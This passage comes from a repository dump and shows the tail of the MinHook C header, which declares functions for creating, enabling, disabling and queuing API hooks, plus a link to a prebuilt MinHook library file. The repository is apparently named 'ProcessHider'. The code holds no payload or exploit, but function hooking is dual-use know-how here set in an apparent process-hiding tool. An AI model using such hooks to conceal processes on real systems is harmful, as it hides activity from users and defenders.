127 | // Creates a Hook for the specified API function, in disabled state.
128 | // Parameters:
129 | // pszModule [in] A pointer to the loaded module name which contains the
130 | // target function.
131 | // pszProcName [in] A pointer to the target function name, which will be
132 | // overridden by the detour function.
133 | // pDetour [in] A pointer to the detour function, which will override
134 | // the target function.
135 | // ppOriginal [out] A pointer to the trampoline function, which will be
136 | // used to call the original target function.
137 | // This parameter can be NULL.
138 | // ppTarget [out] A pointer to the target function, which will be used
139 | // with other functions.
140 | // This parameter can be NULL.
141 | MH_STATUS WINAPI MH_CreateHookApiEx(
142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget);
143 |
144 | // Removes an already created hook.
145 | // Parameters:
146 | // pTarget [in] A pointer to the target function.
147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget);
148 |
149 | // Enables an already created hook.
150 | // Parameters:
151 | // pTarget [in] A pointer to the target function.
152 | // If this parameter is MH_ALL_HOOKS, all created hooks are
153 | // enabled in one go.
154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget);
155 |
156 | // Disables an already created hook.
157 | // Parameters:
158 | // pTarget [in] A pointer to the target function.
159 | // If this parameter is MH_ALL_HOOKS, all created hooks are
160 | // disabled in one go.
161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget);
162 |
163 | // Queues to enable an already created hook.
164 | // Parameters:
165 | // pTarget [in] A pointer to the target function.
166 | // If this parameter is MH_ALL_HOOKS, all created hooks are
167 | // queued to be enabled.
168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget);
169 |
170 | // Queues to disable an already created hook.
171 | // Parameters:
172 | // pTarget [in] A pointer to the target function.
173 | // If this parameter is MH_ALL_HOOKS, all created hooks are
174 | // queued to be disabled.
175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget);
176 |
177 | // Applies all queued changes in one go.
178 | MH_STATUS WINAPI MH_ApplyQueued(VOID);
179 |
180 | // Translates the MH_STATUS to its name as a string.
181 | const char * WINAPI MH_StatusToString(MH_STATUS status);
182 |
183 | #ifdef __cplusplus
184 | }
185 | #endif
186 |
187 |
--------------------------------------------------------------------------------
/include/libMinHook.x64.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kernelm0de/ProcessHider/b9ae6634e8277c152c8e7ac6b867055d0087c977/include/libMinHook.x64.lib
--------------------------------------------------------------------------------